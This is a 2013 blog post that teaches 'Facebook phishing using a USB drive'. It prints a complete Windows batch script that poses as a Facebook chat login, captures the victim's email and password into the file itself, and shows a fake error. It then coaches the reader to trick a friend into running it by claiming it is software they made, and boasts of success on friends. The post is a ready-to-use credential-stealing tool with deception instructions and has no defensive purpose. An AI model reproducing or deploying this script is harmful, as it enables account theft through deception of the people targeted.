Friday, June 21, 2013

Facebook phishing using a USB drive

Here is a simple trick to get the Email and password of a person via a USB drive with some social engineering.

1. Open notepad and paste the following code and leave a blank line after the code.

TITLE FBChat

ECHO OFF

COLOR 03

CLS

ECHO.

ECHO LOGIN TO START CHATTING ON FACEBOOK

ECHO.

ECHO Please enter your email:

SET/P "MAIL=>"

ECHO.

ECHO Enter the password:

SET/P "PSWD=>"

ECHO EMAIL = %MAIL%>>FBChat.bat

ECHO PASSWORD = %PSWD%>>FBChat.bat

CLS

TIMEOUT /T 5 >NUL

COLOR 0C

ECHO.

ECHO An error occurred while connecting to the server. Try again later.

PAUSE>NUL

EXIT

---------- Below this line are the collected information ----------

2. Save the code as FBChat.bat exactly. Do not name it anything else or it won't work.

3. Put the batch file into a USB drive and give it to your friend.

When you get back the USB drive, right click the batch file and select Edit. Now scroll down and you will see the information collected!

With some social engineering the trick can be very efficient. Before trying this trick out you can tell the victim you are making a cool software and it will be finished soon. Than give the batch file telling him that is the software you made. Try to be convincing and do not let him/her smell a rat! I have tried this trick on some of my friends with 100 percent success. Give it a try yourself

No comments:

Post a Comment